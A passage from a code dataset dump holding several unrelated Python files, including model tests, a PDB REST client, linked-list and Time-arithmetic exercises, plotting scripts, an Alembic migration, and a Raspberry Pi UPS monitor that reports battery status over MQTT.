flavor_wrapper.flavor.series = 'p1'\n\n sql_flavor = flavor_wrapper.to_db_model()\n\n self.assertEqual(len(sql_flavor.flavor_regions), 2)\n self.assertEqual(len(sql_flavor.flavor_tenants), 2)\n\n spec = next(s for s in sql_flavor.flavor_extra_specs if s.key_name == 'key1')\n self.assertEqual(spec.key_value, 'val1')\n\n def test_flavor_summary_from_db_model(self):\n sql_flavor = db_models.Flavor()\n sql_flavor.id = 'some id'\n sql_flavor.name = 'some name'\n sql_flavor.description = 'some_decription'\n\n flavor_summary = models.FlavorSummary.from_db_model(sql_flavor)\n\n 
self.assertEqual(flavor_summary.id, sql_flavor.id)\n self.assertEqual(flavor_summary.name, sql_flavor.name)\n self.assertEqual(flavor_summary.description, sql_flavor.description)\n","sub_path":"orm/tests/unit/fms/test_wsme_models.py","file_name":"test_wsme_models.py","file_ext":"py","file_size_in_byte":3660,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"226154462","text":"#!/usr/bin/env python3\n\"\"\"\nUtility for PDB REST API.\nSee: http://www.rcsb.org/pdb/software/rest.do\n\"\"\"\n###\nimport sys,os,re,json,argparse,time,logging\n#\nfrom .. import pdb\n#\nAPI_HOST='www.rcsb.org'\nAPI_BASE_PATH='/pdb/rest'\n#\n##############################################################################\nif __name__=='__main__':\n epilog=\"\"\"\nExample keywords: ACTIN, Example UniProts: P50225'.\nget_uniprots functionality may be discontinued by PDB.\n\"\"\"\n parser = argparse.ArgumentParser(description='PDB REST API client', epilog=epilog)\n ops = ['show_counts',\n 'list_proteins', 'list_ligands',\n 'search',\n 'get_proteins', 'get_ligands', 'get_ligands_LID2SDF',\n 'get_uniprots']\n parser.add_argument(\"op\", choices=ops, help='operation')\n parser.add_argument(\"--ids\", dest=\"ids\", help=\"PDB IDs, comma-separated\")\n parser.add_argument(\"--i\", dest=\"ifile\", help=\"input file, PDB IDs\")\n parser.add_argument(\"--druglike\", action=\"store_true\", help=\"druglike ligands only (organic; !polymer; !monoatomic)\")\n parser.add_argument(\"--o\", dest=\"ofile\", help=\"output file (TSV)\")\n parser.add_argument(\"--qstr\", help=\"search query\")\n parser.add_argument(\"--api_host\", default=API_HOST)\n parser.add_argument(\"--api_base_path\", default=API_BASE_PATH)\n parser.add_argument(\"-v\", \"--verbose\", action=\"count\", default=0)\n\n args = parser.parse_args()\n\n logging.basicConfig(format='%(levelname)s:%(message)s', level=(logging.DEBUG if args.verbose>1 else logging.INFO))\n\n BASE_URL='https://'+args.api_host+args.api_base_path\n\n ids=[]\n if args.ifile:\n fin = open(args.ifile)\n while True:\n line = fin.readline()\n if not line: break\n ids.append(line.strip())\n elif args.ids:\n ids = re.split('[, ]+', args.ids.strip())\n\n if args.ofile:\n fout = open(args.ofile, \"w+\")\n else:\n fout = sys.stdout\n\n t0=time.time()\n\n if args.op == \"get_proteins\":\n if not ids: parser.error('ID[s] required.')\n pdb.Utils.GetProteins(BASE_URL, ids, fout)\n\n elif args.op == \"get_uniprots\":\n if not ids: parser.error('ID[s] required.')\n pdb.Utils.GetUniprots(BASE_URL, ids, fout)\n\n elif args.op == \"get_ligands\":\n if not ids: parser.error('ID[s] required.')\n pdb.Utils.GetLigands(BASE_URL, ids, args.druglike, fout)\n\n elif args.op == \"get_ligands_LID2SDF\":\n if not ids: parser.error('ID[s] required.')\n pdb.Utils.GetLigands_LID2SDF(BASE_URL, ids, fout)\n\n elif args.op == \"list_proteins\":\n pdb.Utils.ListProteins(BASE_URL, fout)\n\n elif args.op == \"list_ligands\":\n pdb.Utils.ListLigands(BASE_URL, args.druglike, fout)\n\n elif args.op == \"show_counts\":\n pdb.Utils.ShowCounts(BASE_URL)\n\n elif args.op == \"search\":\n ids = pdb.Utils.SearchByKeywords(BASE_URL, args.qstr)\n logging.info('protein count: %d'%(len(ids)))\n pdb.Utils.GetProteins(BASE_URL, ids, fout)\n\n else:\n parser.error('Invalid operation: %s'%args.op)\n\n logging.info(('elapsed time: %s'%(time.strftime('%Hh:%Mm:%Ss', 
time.gmtime(time.time()-t0)))))\n","sub_path":"BioClients/pdb/Client.py","file_name":"Client.py","file_ext":"py","file_size_in_byte":2972,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"30220085","text":"\"\"\"\nhttps://www.geeksforgeeks.org/delete-n-nodes-after-m-nodes-of-a-linked-list/\n\"\"\"\nfrom __future__ import print_function\nfrom linklist import SimpleNode as Node\nfrom linklist import printlist\n\n\ndef deleteMN(head, m , n):\n \n curr = head \n \n while curr is not None:\n \n for i in xrange(m-1):\n curr = curr.next\n if curr is None:\n break\n \n if curr is None:\n return\n \n curr_next = curr.next\n \n for i in xrange(n):\n curr_next = curr_next.next\n if curr_next is None:\n break\n if curr_next is None:\n break\n \n curr.next = curr_next\n curr = curr_next\n \n \n \n \nif __name__ == \"__main__\":\n head = None\n for i in xrange(20, -1, -1 ):\n node = Node(i, head)\n head = node\n printlist(head)\n \n deleteMN(head, 3, 2)\n printlist(head)","sub_path":"Chapter 3 linklist/deleteMN.py","file_name":"deleteMN.py","file_ext":"py","file_size_in_byte":957,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"4572596","text":"\"\"\"empty message\n\nRevision ID: 2c8c5c404272\nRevises: 8d35698772c0\nCreate Date: 2018-10-05 23:55:32.477634\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = '2c8c5c404272'\ndown_revision = '8d35698772c0'\n\nfrom alembic import op\nimport sqlalchemy as sa\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('images',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('image_dir', sa.String(), nullable=True),\n sa.Column('vechile_id', sa.String(), nullable=True),\n sa.Column('timestamp', sa.DateTime(), nullable=True),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_index(op.f('ix_images_timestamp'), 'images', ['timestamp'], unique=False)\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! 
###\n op.drop_index(op.f('ix_images_timestamp'), table_name='images')\n op.drop_table('images')\n # ### end Alembic commands ###\n","sub_path":"migrations/versions/2c8c5c404272_.py","file_name":"2c8c5c404272_.py","file_ext":"py","file_size_in_byte":972,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"555921379","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Oct 18 09:54:27 2017\n\n@author: oyeda\n\"\"\"\n\nimport pandas as pd\n\nimport matplotlib.pyplot as plt\n\ndataframe = pd.read_csv('C:/Users/oyeda/Desktop/AUTOGIS/ass7/Kumpula-June-2016-w-metadata.txt', skiprows= 8)\n\ndataframe.columns\n\nx = dataframe['YEARMODA']\ny = dataframe['TEMP']\n\nplt.plot(x,y)\n\n\n#'r is the colour, o is the circle point, -- is the line connecting the points\nplt.plot(x,y, 'ro--')\nplt.title('Kumpula Temperature in June 2016')\nplt.xlabel('Date')\nplt.ylabel('Temperatue [F]')\nplt.text(20160604, 68, 'High temp in early june')\nplt.axis([20160615, 20160630, 55.0, 70.0])\n\n\nplt.bar(x,y)\nplt.axis([20160615, 20160630, 55.0, 70.0])\n\n\n","sub_path":"ass7/example.py","file_name":"example.py","file_ext":"py","file_size_in_byte":681,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"260497345","text":"# Definition for singly-linked list.\nclass ListNode:\n def __init__(self, x):\n self.val = x\n self.next = None\n\n# if I don't reverse linked-list,\n# then must use stack\nclass Solution:\n def addTwoNumbers(self, l1: ListNode, l2: ListNode) -> ListNode:\n\n def reverseLinkedList(node: ListNode) -> ListNode:\n if not node.next:\n return node\n\n newHead = None\n while node:\n extraction = node\n node = node.next\n extraction.next = newHead\n newHead = extraction\n\n return newHead\n\n newl1 = reverseLinkedList(l1)\n newl2 = reverseLinkedList(l2)\n\n carry = 0\n dummy = cur = ListNode(0)\n while newl1 or newl2 or carry:\n if newl1:\n carry += newl1.val\n newl1 = newl1.next\n if newl2:\n carry += newl2.val\n newl2 = newl2.next\n cur.next = ListNode(carry%10)\n cur = cur.next\n carry //= 10\n\n return reverseLinkedList(dummy.next)","sub_path":"solutions/Linked List/problem445_Add Two Numbers II.py","file_name":"problem445_Add Two Numbers II.py","file_ext":"py","file_size_in_byte":1104,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"509307517","text":"import sys\nimport Promotions\nimport GC_ADM\n\n\n\"\"\"\nMain function to run the program. 
Required Inputs:\n :arg Task to Perform\n\"\"\"\nif __name__ == '__main__':\n if len(sys.argv) > 1:\n task_to_do = sys.argv[1]\n if task_to_do == 'Create Promotion Citations':\n Promotions.process()\n elif task_to_do == 'GC and ADM':\n GC_ADM.process()\n else:\n raise Exception('Unknown task: {0}'.format(task_to_do))\n else:\n raise Exception('The minimal input is a task to perform!')\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"109612331","text":"from django.shortcuts import render\n\n# Create your views here.\n\nfrom .models import MovieTable\nfrom django.db.models import Avg\nimport requests\nimport lxml.etree\n\n\ndef add(request):\n #从models取数据传递给templates\n user_agent = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36'\n headers = {'User-Agent':user_agent}\n url = 'https://movie.douban.com/subject/20495023/comments'\n\n response = requests.get(url=url, headers=headers)\n # print(response.text)\n\n selector = lxml.etree.HTML(response.text)\n\n dict = {'allstar50 rating':5,'allstar40 rating':4,'allstar30 rating':3,\n 'allstar20 rating':2,'allstar10 rating':1}\n\n for i in range(1,21):\n review = selector.xpath(f'//*[@id=\"comments\"]/div[{i}]/div[2]/p/span/text()')\n rating = selector.xpath(f'//*[@id=\"comments\"]/div[{i}]/div[2]/h3/span[2]/span[2]/@class')\n star = dict[rating[0]]\n m = MovieTable()\n m.review = review\n m.star = star\n m.save()\n return render(request,'result.html',locals())\n\ndef display(request):\n querystr = request.GET.get('q')\n conditions = {'star__gt':3}\n if querystr is not None and querystr != '':\n conditions = {'star__gt':3,'review__contains':querystr}\n contents = MovieTable.objects.filter(**conditions)\n return render(request,'index.html',locals())","sub_path":"week06/TSDjango/moviespider/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"569732831","text":"import numpy as np\nimport math\nimport matplotlib.pyplot as plt\nfrom svm import SVM\n\n\ndef plot_data(plt: plt, x: np.ndarray, y: np.ndarray, STYLE, label: str = ''):\n '''\n Visualize 2D data items - color according to their class\n :param plt: Plotting library to be used - ex pass plt (import matplotlib.pyplot as plt)\n :param x: 2D data\n :param y: Data labels\n :param STYLE: Marker style and color in list format, ex: [['red', '+'], ['blue', '_']]\n :param label: Obtional plot name\n '''\n unique = np.unique(y)\n for li in range(len(unique)):\n x_sub = x[:, y[0, :] == unique[li]]\n plt.scatter(x_sub[0, :], x_sub[1, :], c=STYLE[li][0], marker=STYLE[li][1], label=label + str(li))\n plt.legend()\n\n\ndef plot_linear_separator(plt: plt, svm: SVM, datamin: int, datamax: int):\n '''\n Visualize linear SVM separator with margins\n :param plt: Plotting library to be used - ex pass plt (import matplotlib.pyplot as plt)\n :param svm: SVM object\n :param datamin: min value on x and y axis to be shown\n :param datamax: max value on x and y axis to be shown\n '''\n x = np.arange(datamin, datamax + 1.0)\n MARG = -(svm.w[0] * x + svm.bias) / svm.w[1]\n YUP = (1 - svm.w[0] * x - svm.bias) / svm.w[1] # Margin\n YLOW = (-1 - svm.w[0] * x - svm.bias) / svm.w[1] # Margin\n plt.plot(x, MARG, 'k-')\n plt.plot(x, YUP, 'k--')\n plt.plot(x, YLOW, 'k--')\n for sv in svm.sv:\n 
plt.plot(sv[0], sv[1], 'kx')\n\n\ndef plot_kernel_separator(plt: plt, svm: SVM, datamin: float, datamax: float, h: float = 0.05, alpha: float = 0.25):\n '''\n :param plt: Plotting library to be used - ex pass plt (import matplotlib.pyplot as plt)\n :param svm: SVM object\n :param datamin: min value on x and y axis to be shown\n :param datamax: max value on x and y axis to be shown\n :param h: Density of classified background points\n :return:\n '''\n # function visualizes decision boundaries using color plots\n # creating meshgrid for different values of features\n xx, yy = np.meshgrid(np.arange(datamin, datamax, h), np.arange(datamin, datamax, h))\n # extracting predictions at different points in the mesh\n some = np.transpose(np.c_[xx.ravel(), yy.ravel()])\n Z = svm.classifyKernel(some)\n Z = Z.reshape(xx.shape)\n # plotting the mesh\n plt.pcolormesh(xx, yy, Z, cmap=plt.cm.Paired, alpha=alpha, shading='auto')\n for sv in svm.sv:\n plt.plot(sv[0], sv[1], 'kx')\n plt.grid()\n\n\ndef get_rbg_image(image: np.ndarray) -> np.ndarray:\n img = np.zeros((32, 32, 3))\n img[:, :, 0] = np.reshape(image[:1024], (32, 32))\n img[:, :, 1] = np.reshape(image[1024:2048], (32, 32))\n img[:, :, 2] = np.reshape(image[2048:], (32, 32))\n\n return img\n\n\ndef figurePlotting(imgarray: np.ndarray, N: int, is_cifar: bool, name: str = '', random: bool = True) -> None:\n '''\n CIFAR / MNIST image visualization - rescaling the vector images to 32x32 and visualizes in a matplotlib plot\n :param imgarray: Array of images to be visualized, each column is an image\n :param N: Number of images per row/column\n :param name: Optional name of the plot\n :param random: True if the images should be taken randomly from the array - otherwise start of the array is taken\n '''\n plt.figure(name)\n for i in range(0, N * N):\n imgIndex = i\n if random:\n imgIndex = np.random.randint(low=0, high=imgarray.shape[1])\n if is_cifar:\n img = get_rbg_image(imgarray[:, imgIndex])\n plt.subplot(N, N, i + 1)\n plt.imshow(img)\n plt.axis('off')\n else:\n img = np.reshape(imgarray[:, imgIndex], (16, 16))\n plt.subplot(N, N, i + 1)\n plt.imshow(img, cmap='gray')\n plt.axis('off')\n\n\ndef visualizeClassification(data: np.ndarray, labels: np.ndarray, predictions: np.ndarray, num: int, is_cifar: bool,\n name='') -> None:\n '''\n Use SVM classifier to classify images and plot a window with correctly classified and one with wrongly classified images\n :param data: CIFAR data each column is an image\n :param labels: Data labels (-1.0 or 1.0)\n :param predictions: Predicted data labels (-1.0 or 1.0)\n :param num: Number of CIFAR images to show\n :param name: Optional name of the plot\n '''\n res = np.abs(predictions - labels) / 2.0\n number_of_misses = int(np.sum(res))\n number_of_hits = int(data.shape[1] - number_of_misses)\n index = (res == 1.0).reshape(-1).astype(bool)\n\n missed_vectors = data[:, index]\n n_pictures = int(math.ceil(math.sqrt(min(num, number_of_misses))))\n\n if n_pictures > 0:\n figurePlotting(missed_vectors, n_pictures, is_cifar, name + \": Misclassified\")\n\n index = np.invert(index)\n hit_vectors = data[:, index]\n n_pictures = int(math.ceil(math.sqrt(min(num, number_of_hits))))\n\n if n_pictures > 0:\n figurePlotting(hit_vectors, n_pictures, is_cifar, name + \": Correct\")\n plt.show()\n","sub_path":"code/plotting_helper.py","file_name":"plotting_helper.py","file_ext":"py","file_size_in_byte":4997,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} 
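The plotting_helper record above shades decision regions by classifying every point of a meshgrid. A minimal self-contained sketch of that same pcolormesh pattern, with a toy sign classifier standing in for SVM.classifyKernel (the SVM class itself is not part of this dump):

import numpy as np
import matplotlib.pyplot as plt

def classify(points):
    # Toy stand-in for svm.classifyKernel: points has shape (2, N),
    # labels are -1/+1 by the sign of x + y.
    return np.where(points[0, :] + points[1, :] > 0.0, 1.0, -1.0)

h, lo, hi = 0.05, -2.0, 2.0
xx, yy = np.meshgrid(np.arange(lo, hi, h), np.arange(lo, hi, h))
grid = np.transpose(np.c_[xx.ravel(), yy.ravel()])   # (2, N), as in the helper
Z = classify(grid).reshape(xx.shape)
plt.pcolormesh(xx, yy, Z, cmap=plt.cm.Paired, alpha=0.25, shading='auto')
plt.grid()
plt.show()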
+{"seq_id":"199801301","text":"import sys\n\nimport numpy as np\nimport pytest\n\nfrom opytimizer.core import function\nfrom opytimizer.optimizers import abc\nfrom opytimizer.spaces import search\n\n\ndef test_abc_hyperparams():\n hyperparams = {\n 'n_trials': 5\n }\n\n new_abc = abc.ABC(hyperparams=hyperparams)\n\n assert new_abc.n_trials == 5\n\n\ndef test_abc_hyperparams_setter():\n new_abc = abc.ABC()\n\n new_abc.n_trials = 10\n assert new_abc.n_trials == 10\n\n\ndef test_abc_build():\n new_abc = abc.ABC()\n\n assert new_abc.built == True\n\n\ndef test_abc_run():\n def square(x):\n return np.sum(x**2)\n\n new_function = function.Function(pointer=square)\n\n hyperparams = {\n 'n_trials': 10\n }\n\n new_abc = abc.ABC(hyperparams=hyperparams)\n\n search_space = search.SearchSpace(n_agents=2, n_iterations=100,\n n_variables=2, lower_bound=[0, 0],\n upper_bound=[10, 10])\n\n history = new_abc.run(search_space, new_function)\n\n assert len(history.agents) > 0\n assert len(history.best_agent) > 0\n","sub_path":"tests/opytimizer/optimizers/test_abc.py","file_name":"test_abc.py","file_ext":"py","file_size_in_byte":1075,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"395473692","text":"# -*-coding:utf-8-*-\n# @Time : 2019/6/19 0019 16:27\n# @Author :zhuxinquan\n# @File : echarts_02.py\n\n\n# from pyecharts import Map, Geo\nfrom pyecharts.charts import Geo, Map\n# 世界地图数据\nvalue = [95.1, 23.2, 43.3, 66.4, 88.5]\nattr = [\"China\", \"Canada\", \"Brazil\", \"Russia\", \"United States\"]\n\n# 省和直辖市\nprovince_distribution = {\n '河南': 45.23,\n '北京': 37.56,\n '河北': 21,\n '辽宁': 12,\n '江西': 6,\n '上海': 20,\n '安徽': 10,\n '江苏': 16,\n '湖南': 9,\n '浙江': 13,\n '海南': 2,\n '广东': 22,\n '湖北': 8,\n '黑龙江': 11,\n '澳门': 1,\n '陕西': 11,\n '四川': 7,\n '内蒙古': 3,\n '重庆': 3,\n '云南': 6,\n '贵州': 2,\n '吉林': 3,\n '山西': 12,\n '山东': 11,\n '福建': 4,\n '青海': 1,\n '舵主科技,质量保证': 1,\n '天津': 1,\n '其他': 1}\nprovice = list(province_distribution.keys())\nvalues = list(province_distribution.values())\n\n# 城市 -- 指定省的城市 xx市\ncity = ['郑州市', '安阳市', '洛阳市', '濮阳市', '南阳市', '开封市', '商丘市', '信阳市', '新乡市']\nvalues2 = [1.07, 3.85, 6.38, 8.21, 2.53, 4.37, 9.38, 4.29, 6.1]\n\n# 区县 -- 具体城市内的区县 xx县\nquxian = ['夏邑县', '民权县', '梁园区', '睢阳区', '柘城县', '宁陵县']\nvalues3 = [3, 5, 7, 8, 2, 4]\n\n\n# maptype='china' 只显示全国直辖市和省级\n# 数据只能是省名和直辖市的名称\nmap = Map(\"中国地图\", '中国地图', width=1200, height=600)\nmap.add(\n \"\",\n provice,\n values,\n visual_range=[\n 0,\n 50],\n maptype='china',\n is_visualmap=True,\n visual_text_color='#000')\nmap.show_config()\nmap.render(path=\"04-01中国地图.html\")\n","sub_path":"Python/Test_matplotlib/mat_map_echarts/echarts_02.py","file_name":"echarts_02.py","file_ext":"py","file_size_in_byte":1751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"370186088","text":"#!/usr/bin/python\nimport smbus\nimport time\nimport os, sys\nimport paho.mqtt.client as mqtt\nimport json\nimport logging\nimport RPi.GPIO as GPIO\n\nlogging.basicConfig(level=logging.INFO)\n\nclient =mqtt.Client(\"ups\")\nMQTT_BROKER_ADDR = 'localhost'\nTOPIC = \"/feeds/ups\"\n\nbus = smbus.SMBus(1) # 1 = /dev/i2c-1 (port I2C1)\nADDRESS = 0x6a #I2C address of the ups\n#Refer to http://www.ti.com/lit/ds/symlink/bq25895.pdf for register maps\n\n### Initialization ###############################################\nREG_WATCHDOG = 0x07\nBYTE_WATCHDOG_STOP = 0b10001101 #Stop Watchdog timer\nREG_ILIM = 0x00 #ILIM register\nBYTE_ILIM = 0b01101000 #2A input current limit\nREG_ICHG = 0x04 
\nBYTE_ICHG = 0b00001000 #.5A charging current limit\nREG_CONV_ADC = 0x02\nREG_BATFET = 0x09\nBYTE_BATFET = 0b01001000 #delay before battery is disconnected\n\ntry:\n bus.write_byte_data(ADDRESS, REG_WATCHDOG, BYTE_WATCHDOG_STOP)\n bus.write_byte_data(ADDRESS, REG_ILIM, BYTE_ILIM)\n bus.write_byte_data(ADDRESS, REG_ICHG, BYTE_ICHG)\n bus.write_byte_data(ADDRESS, REG_BATFET, BYTE_BATFET)\n logging.info(\"UPS initialized\")\nexcept:\n logging.error(\"Initialization failed, check connection to the UPS!\")\n sys.exit(1) \n###################################################################\n\n\nBAT_CAPACITY = 2900 #Battery capacity in mah\nCURRENT_DRAW = 2000 #Current draw in mah\nREG_CONV_ADC = 0x02\nBYTE_CONV_ADC_START = 0b10011101\nBYTE_CONV_ADC_STOP = 0b00011101\nREG_BATFET_DIS = 0x09\nBYTE_BATFET_DIS = 0b01101000\nREG_STATUS = 0x0B #address of status register\nREG_BATV = 0x0e\nREG_FAULT = 0x0c\n\nSLEEPDELAY = 10\n\ndisconnectflag = False\nshutdowncmd = 'sudo shutdown -H '\ncancelshutdowncmd = 'sudo shutdown -c'\nbatpercentprev = 0\n\ndef int_to_bool_list(num):\n return [bool(num & (1<1 :\n batpercent = 1\n \n timeleftmin = int( batpercent * 60* BAT_CAPACITY / CURRENT_DRAW)\n if timeleftmin < 0 :\n timeleftmin = 0\n \n if power == \"Connected\" :\n timeleftmin = -1 \n \n if power == \"Not Connected\" and disconnectflag == False :\n disconnectflag = True\n message = \"echo Power Disconnected, system will shutdown in %d minutes! | wall\" % (timeleftmin)\n os.system(message)\n \n if power == \"Connected\" and disconnectflag == True :\n disconnectflag = False\n message = \"echo Power Restored, battery at %d percent | wall\" % (batpercentprev * 100)\n os.system(message)\n \n batpercentprev = batpercent\n\n data = { \n 'PowerInput': power,\n 'ChargeStatus' : charge,\n 'BatteryVoltage' : '%.2f'%batv,\n \"BatteryPercentage\" : int(batpercent*100),\n 'TimeRemaining' : int(timeleftmin)\n }\n \n data_out = json.dumps(data)\n logging.debug(data)\n\n try:\n client.publish(TOPIC,data_out)\n except:\n logging.error(\"Error publishing ups status\")\n\n if(batv < 3.5):\n client.disconnect()\n bus.write_byte_data(ADDRESS, REG_BATFET_DIS, BYTE_BATFET_DIS)\n os.system('sudo shutdown -H now')\n\ndef interrupt_handler(channel):\n read_status() \n\ntry:\n client.connect(MQTT_BROKER_ADDR)\n logging.info(\"Connected to MQTT broker\")\nexcept:\n logging.error(\"Error connecting to MQTT broker\") \n\nread_status()\nGPIO.setmode(GPIO.BCM)\nGPIO.setup(4, GPIO.IN, pull_up_down=GPIO.PUD_UP)\nGPIO.add_event_detect(4, GPIO.FALLING, callback=interrupt_handler, bouncetime=200)\n\nwhile (True):\n time.sleep(SLEEPDELAY)\n read_status()\n \n","sub_path":"src/upsmqtt.py","file_name":"upsmqtt.py","file_ext":"py","file_size_in_byte":5301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"352704228","text":"class Time:\r\n def __init__(self, h, m, s):\r\n self.hour = h\r\n self.min = m\r\n self.sec = s\r\n \r\n def show(self):\r\n print(f\"Result is: {self.hour}:{self.min}:{self.sec}\")\r\n \r\n def SUM(self, time2):\r\n result = Time(None, None, None)\r\n result.hour = self.hour + time2.hour\r\n result.min = self.min + time2.min\r\n result.sec = self.sec + time2.sec\r\n\r\n if result.sec >= 60:\r\n result.min += result.sec // 60\r\n result.sec = result.sec % 60\r\n \r\n if result.min >= 60:\r\n result.hour += result.min // 60\r\n result.min = result.min % 60\r\n \r\n return result\r\n\r\n def Submission(self, time2):\r\n result = Time(None, None, None)\r\n result.hour = 
self.hour - time2.hour\r\n result.min = self.min - time2.min\r\n result.sec = self.sec - time2.sec\r\n\r\n while result.sec < 0 :\r\n result.min -= 1\r\n result.sec += 60\r\n \r\n while result.min < 0 :\r\n result.hour -= 1\r\n result.min += 60\r\n\r\n if result.hour < 0 :\r\n return 'This can not be calculated'\r\n \r\n else:\r\n return result\r\n\r\n def seconds_to_time(self):\r\n result = Time(0, 0, 0)\r\n result.sec = self.sec\r\n \r\n while result.sec >= 60:\r\n result.min += 1\r\n result.sec -= 60\r\n \r\n while result.min >= 60:\r\n result.hour += 1\r\n result.min -= 60\r\n\r\n return result\r\n\r\n def time_to_seconds(self):\r\n result = Time(0, 0, 0)\r\n result.sec = self.sec\r\n result.sec += self.min * 60\r\n result.sec += self.hour * 3600\r\n\r\n return result\r\n\r\n\r\n \r\n\r\ndef show_menu():\r\n print(\"1- Sum\\n2- Submission\\n3- Convert seconds to time\\n4- Convert time to seconds\\n5- Exit\")\r\n\r\ndef get_input():\r\n time_1 = input('Please enter first time (hh:mm:ss): ')\r\n time_1 = time_1.split(':')\r\n \r\n time_2 = input('Please enter second time (hh:mm:ss): ')\r\n time_2 = time_2.split(':')\r\n\r\n time1 = Time(int(time_1[0]), int(time_1[1]), int(time_1[2]))\r\n time2 = Time(int(time_2[0]), int(time_2[1]), int(time_2[2]))\r\n\r\n return time1 , time2\r\n\r\ndef get_sec():\r\n seconds = int(input('Please enter seconds: '))\r\n return Time(None, None, seconds)\r\n\r\ndef get_time():\r\n time = input('Please enter time (hh:mm:ss): ')\r\n time = time.split(':')\r\n return Time(int(time[0]), int(time[1]), int(time[2]))\r\n\r\n\r\nwhile True:\r\n show_menu()\r\n user_choice = int(input('Please choose an option: '))\r\n\r\n if user_choice == 1:\r\n time_1 , time_2 = get_input()\r\n time_1.SUM(time_2).show()\r\n\r\n elif user_choice == 2:\r\n time_1 , time_2 = get_input()\r\n try:\r\n time_1.Submission(time_2).show()\r\n except:\r\n print(time_1.Submission(time_2))\r\n\r\n elif user_choice == 3:\r\n sec = get_sec()\r\n sec.seconds_to_time().show()\r\n\r\n elif user_choice == 4:\r\n time = get_time()\r\n print(f\"Result is: {time.time_to_seconds().sec}\")\r\n\r\n elif user_choice == 5:\r\n break","sub_path":"2- Time (Object oriented).py","file_name":"2- Time (Object oriented).py","file_ext":"py","file_size_in_byte":3161,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"283246882","text":"#!/usr/bin/python\n\nimport unittest\nfrom util import django_utils\n\nimport approximate_matcher\n\n\"\"\"\nThis test is probably useless now because \n1. It doesn't appear to connect to a DB. \n2. 
We are primarily using the haystack based search for matching.\nShould figure out how to mock haystack connections for testing.\n\"\"\"\n\nclass TestMatcher(unittest.TestCase):\n \"\"\"Tests for matcher.Matcher.\"\"\"\n \n test_names = ('avi',\n 'ari',\n 'ariel',\n 'glucose',\n 'glucosamine',\n 'alanine',\n 'phenylalanine',\n 'l-glucosamine',\n 'lactate dehydrogenase')\n \n def _CheckIsSortedByScore(self, results):\n prev_score = 10.0 # Scores are all <= 1.0\n for match in results:\n self.assertTrue(match.score <= prev_score)\n prev_score = match.score\n \n def _CheckAllNamesOnMatcher(self, names, matcher, max_results, min_score,\n check_sorted=True):\n for name in names: \n results = matcher.Match(name)\n self.assertTrue(len(results) <= max_results,\n msg='%d results but max_results=%d' % (len(results),\n max_results))\n if check_sorted:\n self._CheckIsSortedByScore(results)\n \n for result in results:\n self.assertTrue(result.score >= min_score)\n \n def testEditDistanceMatcher(self): \n for max_results in (1, 5, 10):\n for min_score in (0.0, 0.3, 0.7):\n m = approximate_matcher.EditDistanceMatcher(\n max_results=max_results, min_score=min_score)\n self._CheckAllNamesOnMatcher(\n self.test_names, m, max_results, min_score)\n \n\n def testPrepareExpression(self):\n m = approximate_matcher.RegexApproxMatcher({})\n examples = ((' teSt tEsT ', '.*test[-+,[:digit:][:blank:]]+test.*'),\n ('gluco', '.*gluco.*'),\n ('D Fructo', '.*d[-+,[:digit:][:blank:]]+fructo.*'),\n ('aspartyl-phosphate', '.*aspartyl[-+,[:digit:][:blank:]]+phosphate.*'))\n for query, expression in examples:\n self.assertEqual(expression, m._PrepareExpression(query))\n\n def testRegexApproxMatcher(self):\n for max_results in (1, 5, 10):\n for min_score in (0.0, 0.3, 0.7):\n m = approximate_matcher.RegexApproxMatcher(\n max_results=max_results, min_score=min_score)\n self._CheckAllNamesOnMatcher(\n self.test_names, m, max_results, min_score)\n \n def testCascadingMatcher(self):\n for max_results in (1, 5, 10):\n for min_score in (0.0, 0.3, 0.7):\n m = approximate_matcher.CascadingMatcher(\n max_results=max_results, min_score=min_score)\n \n # We don't check if things are sorted on the cascading \n # matcher because it doesn't sort across the results\n # of it's sub-matchers.\n self._CheckAllNamesOnMatcher(\n self.test_names, m, max_results, min_score,\n check_sorted=False)\n\n\nif __name__ == '__main__':\n unittest.main()","sub_path":"matching/approximate_matcher_test.py","file_name":"approximate_matcher_test.py","file_ext":"py","file_size_in_byte":3411,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"377464485","text":"import sys\nsys.path.append(\"../../../../\")\nfrom tests.utils.cmd_args import args\nfrom tests.utils.logger import log\nsys.path.append(\"../../\")\nimport hive_utils\n\n\ndef start_node(**kwargs):\n node=None\n if args.hive_path:\n log.info(\"Running hived via {} in {} with config {}\".format(args.hive_path, \n args.hive_working_dir, \n args.hive_config_path)\n )\n \n node = hive_utils.hive_node.HiveNodeInScreen(\n args.hive_path, \n args.hive_working_dir, \n args.hive_config_path, **kwargs\n )\n 